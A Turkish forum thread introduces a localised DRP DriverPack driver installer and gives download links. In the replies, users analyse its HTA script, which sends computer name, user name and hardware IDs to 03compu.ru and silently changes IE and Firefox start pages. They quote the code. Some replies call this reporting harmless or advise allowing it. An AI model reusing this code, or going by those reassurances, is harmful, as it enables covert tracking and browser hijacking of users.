Jump to content

Drp Driverpack - 1.0 Beta 6

TosunPASA

Recommended Posts

DRP - DRiverPack

Bu konu başlığı bu aşamalardan oluşmakta ve yazdığım kısmın tamamını okumadan Soru Soran veya açıklama isteyenlere cevap verilmeyecektir.

1. Kısa Bilgi - Program Ne işe Yarar

2. Programın Ekran Görüntüleri ile Anlatımı

3. Programın Güncellenmesi ve Yeni Paketlerin dahil edilmesi

4. Download Linkleri

5. Soruların Cevapları

Konu başlığı forum adminlerimin mesajları vede istekleri doğrultusunda yeniden açılmıştır.

Burda maksadımız bu güzel vatanın güzel evladına elimizdeki olanları paylaşmak. Yaptığımız ve bildiğimiz kısmında birbirimizle paylaşmak

TNCTR yi benim için özel yapan kısmı da bu. Yani Yönetici vede Yazar kadrosu tamamen bu düşünce ile bir araya gelmiş kişilerden oluşuyor.

1. Kısa Bilgi - Program Ne işe Yarar :

Bu program http://forum.oszone.net sitesinden yayınlanmış bir projenin Türkçe olarak bizlerin kullanımı amacı ile Ben ve BlackMan12 kardeşimizin ortak çalışması şeklinde çıkmıştır. Yeni versiyonu var ama sorunları veya hata mesajı sizle paylaştığımdan çok daha fazla

Ne İş Yapıyor :

a. Yeni kurulmuş bir Window 2000 - 2003 ve XP de eksik olan (kurulum sonrası) Driver ları Yüklemek - Güncellemek - Biliyorsanız da alternatif bir driver ile değiştirme işlemlerini yapabilirsiniz. Vista'da deneseniz bile benim Türkçeleyip Yardım Menüsüne de eklediğim hata açıklamasını alacaksınız.

b. Daha önce kurulum yapılmış ama Driver güncellemesi ihtiyaç duyan sistemlerde Driver Güncellemesi yapabilir

c. Sorunlu driverların değiştirilmesi vede Toplu bir paket olarak istenilen yerde Driver ihtiyaçlarının giderilmesi amacı TEK bir CD/DVD ile taşınarak kullanılabilmektedir

DRP_000000002.JPG

bu ekran görüntüsü benim şuan kullandığım PC deki durumdur.

Yani. Bütün HardWare lerin driver ları yüklenmiş.

Not : Kendi bilgisayarım için gerekli driver ları NLite içine eklediğimden bazılarını DRP ile kurmuyorum. DRP paketlerinde olmayan veya daha güncel versiyonları oluyor. Örneğin RealTek 5.1 ses kartı driver ım. her zaman sitesinden günceli alıp manuel yüklüyorum

Ekranın Üst kısmındaki ikaz simgelerinin açıklamaları mevcut

2. DRP Türkçe'nin Ekran Görüntüleri ile Anlatımına Başlayalım :

Bu ilk görüntü DRP anlatımı için kurulum yapılmış bilgisayarımın ilk ekran görüntüsüdür

512MB ram,

10GB HDD,

TNT M64 ekran kartı,

P4 - 1.8 GHz işlemcili bir bilgisayar'dır.

Kullanılan Tema = AeroXP teması olup

Wallpaper değiştirildi

MasaÜstünde görülen 2 adet icon tarafımmmmmca başlayıp devam ettirilmeyen bir (İstanbul XP) projenin başlangıcıdır.

Bu projede destek verebilecek PS ve Grafik anlamda başarılı arkadaşlara asla hayır demem. Bir türlü beceremiyorum PS da bişiler yapmayı :good:

DRP_Ekran_t00001.jpg

(resimler kendi hosting'imdendir. Hızlı ekran görüntüleri için xnview ile resim kalitesi düşürülmüştür)

DRP_Ekran_t00002.jpg

CD'ye dosyalar sığmayacağı için DVD deki DRP dizini içinden autorun.hta dosyasını çalıştıralım

DRP_Ekran_t00003.jpg

program çok hızlı bir şekilde HardWare ID lerini tanıdı ve bana bu ekran görüntüsünü verdi.

Resimde görüldüğü gibi Chipset ve Etherneti Windows XP Pro kendisi yüklemiş.

Ekran kartını gündeme bile getirmedi. Ama sizde aynı şekilde olmaz.

NOT : XP imajından hiçbir Windows driver dosyası çıkarılmamıştır. VGA ekran kart ve Ethernet sürücüsünü kendisi yüklemiştir)

Peki neden 2 adet ses kartı paketi buldu ?????? ilerleyen konu anlatımında.

>>>>> Önce Menüleri Tanıyalım.

DRP_Ekran_t00004.jpg

DRP_Ekran_t00005.jpg

DRP_Ekran_t00006.jpg

DRP_Ekran_t00007.jpg

Windows Aygıt Yöneticisini çağırdık ki mevcut sistemin gidişatını beraber izleyelim. Hangi driver lar tanımlı veya tanımlı değil. Yanlış tanımlı varmı ?

DRP_Ekran_t00008.jpg

Sound A : Ben biliyorum ki... Benim AnaKartımdaki Ses Kart driver ı bu paket içinde. Ezbere bildiğim ve önceki tecrübelerimden.

Ama siz bilmenin daha kolay yolunu butonlar üzerine giderek açılan pencereden daha net görebilirsiniz.

DRP_Ekran_t00008.jpg

DRP_Ekran_t00009.jpg

hangisi olduğundan kesin emin olmanız için AnaKart kitapçığından faydalanabilirsiniz.

DRP_Ekran_t00010.jpg

ve driverımızı yüklemek için uygun buton a basıp işlemi başlatalım

DRP_Ekran_t00011.jpg

DRP_Ekran_t00012.jpg

DRP_Ekran_t00013.jpg

DRP_Ekran_t00014.jpg

driver ımız bulundu ve yüklendi.

DRP_Ekran_t00015.jpg

Gördüğünüz gibi bütün driver paketleri yeşil oldu. Yani yüklendi.

Ama 1 adet ses paketi yükledik 2 farklı ses paketi yeşil oldu ?

Çünki orjinal olanı bulduk. Sistem sorunsuz çalıştığı içn diğeri de aynı chipsetinden olduğundan .. sorun vermiyor. Ama bu şekilde olmayabilir veya yeşil olduğu halde ses çıkmaz veya problem olursa ? Olabilir. O zaman diğer paketi aynı adımlar ile kurulumu yapmak gerek.

Şuan kullandığım paketler sizinde göreceğiniz gibi enson driver paketleridir.

1 tek Ethernet (LAN) paketi birönceki setden alınmak zorunda kalındı. Çünki yeni LAN paketinin ID indexini localde hazırlatamadım. Sorun çıkardı bana.

DRP_Ekran_t00015.jpg

ve sorunsuz driver paketleri

DRP_Ekran_t00017.jpg

Bu ekran görüntüsü ile de program dizini altındaki (drp dizini içindeki) tüm driver paketlerini ekrana getiriyoruz veya sadece bu PC için gerekli olanları listeliyoruz.

DRP_Ekran_t00018.jpg

Evet.

drp dizin içindeki bütün paketler ekrana gelmiştir.

burda paket içinde olmayan driver isimleri önemli değil.

Çünki gayet normal bir mesaj.

Her paket içindeki HardWare bilgisayarınızda olacak diye birşey olmadığı gibi paketin 1 inde olan diğerlerinde olmayacak doğal olarak.

Ama.

CPU ve Monitör için soru işareti var ??????

CPU driver paketi içinde AMD markalı CPU için driver dosyaları bulunmakta.

Benim kullandığım her 2 pc de de Intel CPU kullanıyorum.

Ayrıca ekranın üst kısmında sime açıklamaları yeterli olması gerek.. diye düşünüyorum

Monitörüm...

Samsung SYNCMaster 997MB monitör üm var. Paket içinde bulamadı. Olsun. Sorunsuz zaten çalışıyorum.

Yaklaşık 4-5 yıldır da hiç kurma ihtiyacı duymadım. Ama sizin için geçerli olmayabilir. Detaylı Driver Paket bilgi içerikleri bu paketleri indirdiğim sitede detaylu şekilde mevcut.

Güncel driver paketlerini

http://www.driverpacks.net/ adresinden temin edebilirsiniz.

3. Programın Güncellenmesi ve Yeni Paketlerin dahil edilmesi

Öncelikle program dizini altında... drp ve dev_db isimli 2 adet dizin olması gerekiyor

drp dizini = Driver Paktelerini koyduğumuz dizin. Eğer içi boş olursa...

DRP_Guncelleme_001.jpg

ekran görüntüsü ile karşılaşacaksınız. Driver paketleri var ama dev_db içeriğindeki index dizini boş ise veya yeni paketler aldığınız zaman ise

DRP_Guncelleme_001a.jpg

ekranında görüldüğ gibi bütün paketler SORU İŞARETİ şekline dönecektir.

Menülerden İşlemler --- Driver Listesi ---Hepsini seçip tüm paketleri ekrana getirelim

sonra da

DRP_Guncelleme_002.jpg

Menülerden Driver Yapılandırma --- Güncelle seçeneğini seçerek

DRP_Guncelleme_003.jpg

ekranında kırmızı ile Yükleme Seçimi : Güncelle olacak şekilde ekran görüntümüz var ise.. Yeni indirilen paketin ismi yazılı Buton a tıklayabiliriz.

programımız bu paketin index dosyasını dev_db dizini içine oluşturacaktır.

Burda bir noktaya dikkat çekmek istiyorum. Program detayını bilmediğim şekilde (ki bende yaklaşık 40 civarında driver paketi var) bazı paketler için index oluşturmuyor.. bazılarına hata verip kesiyor..

Son versiyon Ethernet (LAN) paketinde olduğu gibi 2 saat geçmesine rağmen index dosyayı oluşturmaya biliyor. O zaman TaskMan dan ben programın çalışan 3 adet dosyasını kapatıyorum.

Pekat sorunsuz index lendi ama hala ekranda soru işareti var ise de...

Menülerden İşlemler --- Ekranı Güncelle seçeneği ile son duruma bakıyoruz.

Bu driver lar yüklendikten sonra da sorunsuz kullanabileceğiniz (Refresh - F5 gibi.. ) komutdur.

Tüm Driver paketlerini dahil etmedim.

Çünki 41 dosya boyutu şimdi baktığımda 880MB mış. Zorunlu veya herkesin ihtiyacı olan diyebileceğim paketleri sizler ile paylaştım

Yeni Driver Paketi indirdiniz

Güncelleme Yapmanız gerek

DRP_Guncelleme_004.jpg

Menülerden >>> İşlemler ----> Driver Yapılandırma ----> Güncelle

Ekran Görüntünüz Yukardaki gibi olduktan sonra index ini güncellemek istediğiniz Driver Paketinin ismi yazılı butona basın ve bekleyin

DRP_Guncelleme_005.jpg

Yukardaki gibi işlem yapılmaya başlanacak. Hata vermeden bitebileceği gibi; Hiç index yapmayabilir. Genelde küçük dosyacıklarda.. Script hata mesajı verip de işlemi yarıda kesebilir. Onların hangileri olduğunu ve detayını sonra bildireceğim. Nedenini henüz öğrenemedim yazılımcı ve forumdan

DRP_Guncelleme_006.jpg

Bu ekran görüntüsü ise.. Dikkatlice bakarsanız.. INDEX leme işlemi bittikten sonraki halidir.

Güncelleme ile ilgili şimdi aklıma birşey gelmiyor.

Sorular veya sorunlar çıktıkça EKRAN GÖRÜNTÜLERİ ile yazmanızı rica ediyorum. İşlem aşamalarını yazmanız sorun çözümünde benden önce başkalarının da size yardımcı olmasında fayda sağlayacaktır. Bu programı bilen veya kullanan tek ben değilim.

Görüldüğü gibi baya bilinen bir program.

YARDIM Menüsü hazırladım ve orda kısaca da olsa açıklamaları ekledim .

4. Download Linkleri

Aşağıda 549MB lık link neden önemli ve öncelikli neden onu paylaştım ?

Arkadaşlarımızın ellerindeki Driver Paketleri genelde benim verdiğimden eski versiyon. Ben çok sık forumları ziyaret ettiğimden vede yeni hazırlanan veya son versiyonları ilk indirip deneyenlerden olduğumdan öncelikle onu indirmenizi tavsiye olarak vermiştim

ha bu arada 3 yıldır rapid Premium hesabın var. son 2 yıldır paylaşım yaptığım divx ve mp3 ler ile yeteri kadar puana sahibim. bazı arkadaşların merakını gidermek için 2 hesabımdaki puan toplamı XXX.000 e yakındır. yani 6 basamaklı sayı.

neden 2 hesap var derseniz.. Rapid in server larından; her hesapda max 500GB lık dosya bulundurabilirsiniz. Benim silinmeden dosya miktarım 800GB idi. Şimdi 400GB. bazılarına yeterli cevaptır.

Dosya toplam boyutu 549MB olup 11*48.8MB + 1*25.3Mb lık paketler halindedir.

http://rapidshare.com/files/193617147/DRP_03_Subat_2008.part01.rar
http://rapidshare.com/files/193626912/DRP_03_Subat_2008.part02.rar
http://rapidshare.com/files/193636212/DRP_03_Subat_2008.part03.rar
http://rapidshare.com/files/193319230/DRP_03_Subat_2008.part04.rar
http://rapidshare.com/files/193332236/DRP_03_Subat_2008.part05.rar
http://rapidshare.com/files/193345471/DRP_03_Subat_2008.part06.rar
http://rapidshare.com/files/193550252/DRP_03_Subat_2008.part07.rar
http://rapidshare.com/files/193563992/DRP_03_Subat_2008.part08.rar
http://rapidshare.com/files/193576781/DRP_03_Subat_2008.part09.rar
http://rapidshare.com/files/193588892/DRP_03_Subat_2008.part10.rar
http://rapidshare.com/files/193600540/DRP_03_Subat_2008.part11.rar
http://rapidshare.com/files/193606651/DRP_03_Subat_2008.part12.rar

[b]Sadece Programın kendisi[/b]  (4MB)
ben dosyaları sıkıştırmak ile geçen süreden rahatsızım. 

http://rapidshare.com/files/193995004/DRP_1_0_Beta_6_Turkce_Tosunpasa.rar
[b]
no pass[/b]

5. Soruların Cevapları

Cevap 0 : Versiyon, konu başlığına konuldu.

Cevap 1 : Bu program Windows kurulumu bittikten sonra çalıştırılır. Katılımsız kuruluma dahil edilmez. Ve ben çalışmalarımda Katılımsız kurulumun hızlı ve küçük yapıda olmasını istiyorum. Katılımsız Driver kuran zaten yapı orjinal sitesinde mevcut.

Cevap 2 : DRP nin sadece program olan kısmı linklerin alt kısmında verilmiştir.

Cevap 3 : Her PC veya sistem de sorunsuz çalışacak diye birşey yok. 3 ekran kartı - 2 adet Ses kartı paket var. yani benzer driver 2 pakette varmış gibi ekrana gelebilir. Siz kendi driver serinizi buton üstünde açılan sarı pencere vasıtası ile seçip yüklemeniz gerekmekte.

Sorunlu yükleme olması halinde yazılım sahibi veya Türkçeleme yapan grubun bir sorumluluğu bulunmamaktadır.

Şahsi tavsiyem boş bir sistemde önce farklı yükleme seçenekleri ile deneme yapmanız olacaktır.

VmWare gibi sanal sistemede yapılacak çalışmalar sadece program kullanımını öğrenmenizi sağlayacaktır. Gerçek bir HardWare yapmanız.. Özellikle bilerek hatalı yüklemeler yapmanızı tavsiye ediyorum. Hatalı yükleme yapıp sonra çıkan sorunları çözmeyi öğrenmeniz için faydalı olacaktır.

Bu paket sorunsuz sistemler için değil .. mevcut driver sorunlu sistemlerin problemlerini gidermek için kullanmanızda faydası olacaktır.

Baris_Seven için daha önce verdiğim cevabı değiştirip yayınladım

Cevap 4 : _EFE_ ... Ekran görüntüsü ve işlem aşamaları yazılmadan size ve sorunları çözmede yardımcı olamayız.

Cevap 5 : İngilizce versiyon diye olan programı netden inceledim. Yeni versiyon paylaşımı yapan arkadaşın verdiği msfn forumdakini de indirdim. Benim elimdeki B7 den daha beter bir halde sorunlu bir versiyon. Ya eksikleri yada paketleme yapılırken hatalı yapılmış.. ancak bunu söyleyebilirim.

Cevap 6 : Driver listesi - tarihi ve Boyutu eklenmiştir. tahminimce sizdekilerden daha yeni versiyon. Birazdan tekrar bakacağım yenilenmiş paket varmı diye...

------------------------------------------------------------------------------------

01.11.2008 00:15 42.371.983 DP_Bluetooth_wnt5_x86-32_081028.7z

05.08.2008 12:09 5.669.846 DP_Broadband_wnt5_x86-32_70416.7z

13.01.2009 13:53 1.997.690 DP_Chipset_wnt5_x86-32_812n1.7z

24.09.2008 01:41 38.153 DP_CPU_wnt5_x86-32_808.7z

13.01.2009 13:53 61.735.514 DP_Graphics_A_wnt5_x86-32_901n1.7z

13.01.2009 14:03 98.406.318 DP_Graphics_B_wnt5_x86-32_901n1.7z

13.01.2009 21:00 86.709.641 DP_Graphics_C_wnt5_x86-32_901n1.7z

11.10.2008 15:44 5.142.799 DP_Input_wnt5_x86-32_070923.7z

30.01.2009 18:32 7.375.412 DP_LAN_wnt5_x86-32_8121.7z

30.01.2009 15:15 24.233.145 DP_Modem_wnt5_x86-32_90128.7z

30.01.2009 15:11 20.101.953 DP_Monitor_wnt5_x86-32_81227.7z

13.01.2009 21:28 103.594.594 DP_Sound_A_wnt5_x86-32_901n1.7z

13.01.2009 21:46 59.712.330 DP_Sound_B_wnt5_x86-32_901n1.7z

11.10.2008 16:13 11.475.479 DP_TV_wnt5_x86-32_80908.7z

14.11.2008 00:00 631.199 DP_USB_wnt5_x86-32_80911.7z

29.11.2008 12:15 20.525.772 DP_WebCam_wnt5_x86-32_81127.7z

05.08.2008 16:05 25.219.348 DP_WLAN_wnt5_x86-32_806A.7z

------------------------------------------------------------------------

Cevap 7 : Güncel versiyon Driver paketlerini alıp drp dizini içine attığınızda hem çalışır hem çalışmaz..

Driver Paketleri Güncelleme Konu anlatımı yapılmıştır...

Cevap 8 : Dosya toplam boyutu 549MB olup 11*48.8MB + 1*25.3Mb lık paketler halindedir. Ben upload ettiğim filimler haricinde programları 50MB lık paketlere bölüyorum ki indirme anında çıkan problemlerden sınırlı kullanıcılar pek fazla etkilenmesin ve bekleme süresi daha aza insin

İstemeyen tek program paketini indirir. İsteyen tüm paketi.

Veya hiç kullanmama hakkınız var.

Teknik Servis işi yapmıyor iseniz. Kendi driver paketlerinizi NLite gibi yazılım ile ISO içine ekleyip kullanmanız. Tüm paketleri ISO ya eklemeniz hem kurulum süresini hemde imaj boyutunu artıracaktır.

Cevap 9 : romeogucci Program sorunsuz olmadığı gibi Beta 6 diye anılıyor. Şimdi. Driver pack lerin listesini zaten yukarda bir istek üzerine verdim. ve sadece LAN 'paketinin önceki versiyondan olduğunu nedenini detaylı anlattım. Bugün yeni bir HP Pavilion 6215 i Vista dan XP ye çevirdim. Ati ekran kartı . RealTek Ses - RealTek Ethernet - 945 intel MB, idi. Sorunsuz yüklendi. Ama bu demek değildir ki program veya paketler arızaları. Ekran görüntülerini anlatırken benzer chip lerin diğer pakette olabileceğini ama hangisinde olduğunu ben genelde ezberlediğim için sorun yaşamıyorum. Ki bugun sadece Fax-Modem i yüklemeyedim. Ona da zaten gerek yoktu. Paketler içinde olmadığı gibi XP de görmedi Modem i.

Eğer hardware bilgilerini detaylı yazar isen sana hangi pakette vs bilgisini verebilirim. Ama kendin öğrenmen için http://www.driverpacks.net/ sitesinden herbir paket detayı zaten var .. ordan kimseye ihtiyaç kalmadan öğrenebilirsin. Diğer konu başlıklarında bazı anlatımlarda olması lazım diye hatırlıyorum

Benim indirdiğim paketlerin link ve içeriklerini ise forumdan bulabilirsiniz

Cevap 10: Eksik paket diye bir söz aslında tam doğru değil. Kime göre neye göre eksik. Ben http://www.driverpacks.net/ sitesinin forumlarında arkadaşların paylaşıtığı ne kadar paket var ise indiriyorum. Kendi ihtiyaç duyduğumdan değil. Bu pakete nerde ihtiyacım olduğu belli olmaz.

Ama illede neler eksik diyor isen.. Yazıcılar (Canon - HP), Scaners, Creative Audio, LCD, SmartCard Reader, TouchScreen, Virtual, WLAN, AHCI, nForce 560 raid.. diye uzar.

Bunların bir kısmı kendi sitesindeki forum bölümündeki 3. Parti Yazılımlar diye arkadaşların hazırlayıp paylaştıkları paketler.

Nasıl hazırlandığı veya hazırlanabileceğini anlatmışlar. Benim gavurcam yeterli değil ki sizler ile paylaşayım.

Cevap 11: Yeni indirdiklerni nasıl kullanabileceğinizi zaten yukarda detaylı - resimli var. Yardım menüsü de ekledim. Anlaşılmayan yeri soralım. Konu Anlatımın tamamını okuyunuz

Cevap 12: Bu paketi herhangi bir katılımsız içinde çalıştırmanız şuanki hali ile hem uygun değil hemde istenen sonuç her zaman alınamayabilir

Cevap 13 : Ana sayfa değişiyor.. evet maalesef. BlackMan12 bununla ilgili çaba sarfediyor. hta dosyalar içinde belirgin birşey bulamadık. ama . hala aramaya ve yeni paketler ile karşılaştırmaya devam ediyor. Benim kod bilgim pek olmadığı için BlackMan12 ilgileniyor bu kısım ile. Script lerden birşey çıkaramaz isek. patch ile çözmeye çalışacak kendisi.. Uğraşıyoruz...

Cevap 14 : entegre... forumdan cevap geldi ve bende kontrol ettim ama neden esed32 farklı bir rus site adresi veriyor bilmiyorum ama.

Programın için de Türkçe'leştirme yaparken de yazmıştım.

Program bir hata kodu aldığında otomatik şekilde kendi server ına gönderiyor. Seninde gördüğün IP adresini sitenin ip adresi. gözüken ismi ile de ping atarak kontrol ettiğimde yazılımcının host ip adresi olarak çıktı. yani sorun yok şuan için.

--------------------------------------------------------------------------------------------

Yukarda anlatılanların tamamını okumadan..

Programı detaylı incelemeden

Aşamaları yazılmamış - Ekran görüntüleri olmayan soru sormayalım.

Bizde insanız. hata yapabiliriz.

Her hatayı da düzeltebilecek değiliz.

Çünki paylaşımın adı gibi. sadece Türkçeleştirdik.. Ufak eklemeler yaptık

Vede burda anlatılanlar kendi emek ve tecrübelerimiz iledir.

Kril alfabesi bilmiyoruz. Ve orjinal forumda detaylı anlatım göremedim. İngilizce bile olsa pek iyi değil. Deneme yanılma ile birçok aşamayı kendim öğrendim

Ama.. her işi tek başıma yapmadım öğrenmedim.

Ve sizlerin tecrübe ve öğrendikleri ile bu bilgi daha büyüyecektir.

NOT : TNCTR de yaptığımız bu paylaşım. İlk günden vede eski içerik şekli ile.. virgül dahi eksiltmeden... izinsiz forumlarda yayınlanmaya başlanmıştır. Bu kaçtane yüzü olduğu belli olmayan kişiler birde programı kendi forumlarında yayınlama hakkını MUYAP dan aldıkları gibi ne konuştuklarını bilmeden cevap yazmaktadır.

Biz bu programı Türkçeleştirip kullanmak istediğimizi yazılımcıya, Menüler konusunda yardım isteğimiz ile bildirdik. Ne kendisi nede forumdaki diğer kişiler yardım etmedi.

Bu forumda; bu paylaşımımızdan rahatsızlık duyan ve ö.m. ile rahatsızlık veren kişiler bulunmaktadır.

Özellikle BlackMan12 nin forum içindeki çalışma ve emekleri su ******ürmez iken onu garip içerikli mesajlar ile rahatsızlık verilmektedir.

---------------------------------------------------

Görsellik değişikliği devam edecek.

Soru- Sorunlara Cevaplar devam edecek.........

• Replies 58
  • Created
  • Last Reply

KonyaSpor

can kardeşim

artık KONYA 'da bir etli pide ısmarlarsın demi.. valla bayadır özledim.. iii pişmiş .. her tarafından yağ akan bir etli pide yi..

Bir ucumuz Karaman da olup.. 4 adet canavar gibi Erkek yiğenim var... ısmarlamaz isen onları üzerine salarım... :good:

KonyaSpor

can kardeşim

artık KONYA 'da bir etli pide ısmarlarsın demi.. valla bayadır özledim.. iii pişmiş .. her tarafından yağ akan bir etli pide yi..

Bir ucumuz Karaman da olup.. 4 adet canavar gibi Erkek yiğenim var... ısmarlamaz isen onları üzerine salarım... :friends:

Konyaya gelen biri isen tabikide ısmarlarım hatta memnun bile olurum :) hatta ve hatta kamyoncuyum çalıştığım bölgelerdeysen paket bile yaptırabilirim :) Karamandamı ıkamet ediyorsun?

Drp'yi çalıştırdığımda aşağıdaki gibi bir uyarı alıyorum.

İzin vermem mi gerekir ?

İzin vermesem de programı normal olarak kullanabilirmiyim.

Edit : İngilizce ve rusça versiyonlarınıda denedim. Aynı uyarıyı alıyorum.

Please register to see this content.

İzin vermen gerekir çünkü hta dosyasının bir bölümünde hata tanımlatmak için sitesine gönderiyor hatayı...He izin vermezsen çalışmaz mı çalışır ama niye kastırıyorsu zararlı birşey olsa bu kadar nazik olmazdı nod32 eylemi anımsa deyip izin ver demeni öneririm...İleride update sorunlarıylada karşılaşmaman için.

dostum...

bende bir antivirüs vs yok

ama.. sen izin verme.. hiçbir zaman bu tür mesajlara izin verme..

BlackMan12 zaten halen script i detaylı inceleyip.. özellikle ie deki default site değiştirmeyi önlemeye çalışıyoruz.. yeni versiyon ile kod olarak farkları bakıyor kendisi

Script konusunda tecrübesi olan arakadaşlar var ise.. yardımcı olmasını rica ediyoruz zaten

ben coder değilim. ama.. bu şekilde bir adresde hiç rastlamadım

ayrıca şuana kadar yazılmış en güzel soru ve ekran görüntüsü..

foruma yazdım tracert komutu ile

cevap bekliyorum. geldiğinde konu anlatımına ekleyeceğim

teşekkür ederim

tskler guzel paylasım olmus ben asagidaki 3 programı kullanıyordum bu programınıda denerim sagol cok detaylı bir anlatım olmus buarada 2'nize tskler asagıdaki linkleri bilgi amaçlı verdim..

156188faf72558b6e9.jpg

capturesq4.jpg

ellerinize sağlık.. benim farklı bi problemim var, ne zaman programı çalıştırsam ana sayfam değişiyor.. (ekran görüntüsüne gerek duymadım)

Site adresi

http://03compu.ru/start/[/CODE]

başka bişi ile alakalı olmadığını düşünüyorum ama yinede peşin konuşmak istemiyorum.. çözüm için istediğiniz bi bilgi varsa yollarım

[u]Edit:[/u] önceden elimde driver paketi olduğu için programın kendisini indirip paketleri "drp" klasörüne attım

Entegre...

abisi

bağlantı şu işe yarıyor

program eğer bir hata mesajı alıyor ise.. aldığı kodu .. kendi server ına gönderiyor

o maksad ile hazırlanmış

Türkçeleme esnasında ben o satırları gördüm ama script bilgim iyi olmadığı için emin değiliz. Forumdan verilen cevap yazılımın kendi server ı dendi

Ama bağlantıdan haberimiz var

Bahsettiğin Problem ise....

Script içinde Dafault WebPage kodunu henüz nasıl değiştirdiğini bulamadık.

Bunu farklı bir kod ile de yapmış olabilirler.. farkedemediğimiz.. bir kod grubu ile de.. bulup çözeceğiz. yada.. yeni versiyondaki sorunlar bitince farklara göre değişikliği reg dosya filan ile manuel yapacağız artık.

şuan için sorun değil.. asıl sorun.. index leme esnasında bazı driverpack lere hata mesajı vermesi ve herkes için güncel driver pack lerin hazırlanmayışı

3.Party bölümünde saolsunlar çok güzel paylaşımlar oluyor ama..

çok da herkes paylaşımcı olamayabiliyor

selamlar

Elinize sağlık arkadaşlar. Rusça çevrilmesi zor bir dil. Büyük uğraş vermişsiniz. :D

Bu programcının yaptığı şu anki driverpacks.net güncel kurulumundaki SAD (Benim çevirimle Sadece Sürücü Yükleme Diski) kurulumunun grafiksel ve kullanımı kolay hale getirilmiş bir şekli. ALEN arkadaşımızın verdiği örneklerde aynı işi yapıyordu tabiki görsellik hariç.

Bağlantı kurma konusuna gelince. HTA tabanlı olduğu için zaten tüm kodlar açıkta. Program belirtilen adrese (

) Windows Bilgisayar Adı ve aktif kullanıcı adını ve alınan hata mesajını gönderiyor.

document.write('<script type="text/javascript" src="http://03compu.ru/driverpacks/errors.php?msg=' + escape(msg) + '&url=' + escape(url) + '&ver=' + escape(version) + '&lno=' + escape(lno) + '&computername=' + escape(ComputerName) + '&username=' + escape(UserName) + '&comment=' + escape(comment) + '"><\/script>');[/CODE]

Bu kısımlar iptal edilerek bu olaydan kurtulabilirsiniz. Tabi istiyorsanız.

Toprak44

script den anliyorsan

senden ricamiz..

internet explorer ın.. default adresini değiştiren satırları bulup silmeye yardım etmen. şuan için öncelik onda

hata kodunu göndermesi aslında bir sorun değil. bizim ve yazılımcı açısından getirisi var

o kodu çıkarmak doğrusunu söylemek gerekirse... işimize gelmedi. Yeni versiyonlar için faydası var.

birde bazı kodları çıkarınca.. hangi satırın neyle bağlantısını ben bilemiyorum. Bu konuda ve diğer danıştığım konularda 1 numarali uzman BlackMan12 dir.

Eğer kodlardan anliyor isen.. satırları bir komple incele.. başlangıç ve bitiş noktalarını farklı açıklama satırları ile ekleyip gönderirsen .. sonraki çalışma için faydası olacaktır.

Bu arada. dün akşam kabaca baktım. Driver Paketlerinin yenisi daha çıkmamış gibi

selamlar herkese

autorun.hta dosyasındaki 512. Satır net üzerinden bağlantı kuruyor ve ana sayfayı değiştiriyor.

document.write('<script type="text/javascript" src="http://03compu.ru/driverpacks/update.php?hwids=' + escape(hwids_update) + '&ver=' + escape(version) + '&extract_date=' + escape(extract_date) + '&ComputerName=' + escape(ComputerName) + '&UserName=' + escape(UserName) + '"><\/script>');[/CODE]

Bu şekilde bilgisayar kullanıcı adı, bilgisayar adı ve tüm donanım id lerini gönderiyor. Arkasından html aracılığı ile ana sayfa değişikliğini yapıyor. Bence yaptığı mükemmel bir iş bile olsa kullanıcıdan izin almadan donanım bilgisi göndermesi ve ana sayfa değişikliği karaktersizliktir.

Buda 03comp.ru sitesinden download edilen ve ana sayfayı değiştiren script.

[CODE]//alert('Ôàéë îáíîâëåíèÿ çàãğóæåí óñïåøíî!\r\nÂàøà âåğñèÿ: ' + version + '\r\nÄàòà ğàñïàêîâêè: ' + extract_date);

if (version != "1.0 Beta 6a") {
if (confirm("Îáíàğóæåíà íîâàÿ âåğñèÿ ïğîãğàììû! Îáíîâèòü?")) {
window.open('http://03compu.ru/driverpack/?update');
}
}

//Îáíîâëåíèå äîìàøíåé ñòğàíèöû áğàóçåğà IE
StartPage = WshShell.RegRead("HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page");
if (StartPage!="http://03compu.ru/start") {
WshShell.Run('reg add "HKCU\\Software\\Microsoft\\Internet Explorer\\Main" /v "Start Page" /d "http://03compu.ru/start" /f',0,true);
}
//Îáíîâëåíèå äîìàøíåé ñòğàíèöû áğàóçåğà IE

//Îáíîâëåíèå äîìàøíåé ñòğàíèöû áğàóçåğà Firefox
var FirefoxDir = WshEnv("APPDATA") + '\\Mozilla\\Firefox\\';
var StartupPage = "http://03compu.ru/start";
if ((fso.FolderExists(FirefoxDir)) && (fso.FileExists(FirefoxDir + 'profiles.ini'))) {
profileIni = fso.OpenTextFile(FirefoxDir + 'profiles.ini', 1, false).ReadAll();

var rege = new RegExp("Path=([\\S]+default)","ig");
rege.exec(profileIni);
profileDir = RegExp.$1;
profileDir = FirefoxDir+profileDir.replace("/","\\");

FirefoxConfFile = profileDir+"\\prefs.js";
if ((fso.FolderExists(profileDir)) && (fso.FileExists(FirefoxConfFile))) {
FirefoxConfR = fso.OpenTextFile(FirefoxConfFile, 1, false).ReadAll();
//alert(FirefoxConfR);

var regSP = new RegExp(StartupPage,"ig");
if (regSP.test(FirefoxConfR) == false) {
FirefoxConfW = fso.OpenTextFile(FirefoxConfFile, 8, false);
FirefoxConfW.WriteLine('user_pref("browser.startup.homepage", "' + StartupPage + '");');
FirefoxConfW.Close();
}

}
}
//Îáíîâëåíèå äîìàøíåé ñòğàíèöû áğàóçåğà Firefox[/CODE]

Toprak çok sağol bu kadarını bende yakalayabilmiştim.Ama Bunu nasıl engelleyebiliriz.Diye düşündüğümde aklıma iki fikir geldi.Bu Linki tosunpasanın hostuna yönlendirmek ve bu scripti kendimize göre düzenleyip yayımlamak etkili bir çözüm önerisi midir?

Toprak çok sağol bu kadarını bende yakalayabilmiştim.Ama Bunu nasıl engelleyebiliriz.Diye düşündüğümde aklıma iki fikir geldi.Bu Linki tosunpasanın hostuna yönlendirmek ve bu scripti kendimize göre düzenleyip yayımlamak etkili bir çözüm önerisi midir?

Denemedim ama ilgili auto update bloğunu komple silersen sorun çıkmaz herhalde, siteye yükleme yapmasına gerek yok bence. Hatta hata durumunda gönderme bile iptal edilmeli. sonuçta yorum olmadan hatayı anlama imkanı yok. Programlayanda rus olduğuna göre ...

Öncelikle çalışma için teşekkür ederim.

Bir sorum var:

Ben sadece programın kendisini indirdim ve indirdiğim driverleride drp dizinine atıp direk cd ye yazdırdım.Şimdi cd yi takınca orda hiç driver çıkmıyor.Listele diyorum tüm driverler çıkıyor fakat hepsi soru işareti.Güncelle dediğimde de hiçbirşey olmuyor.

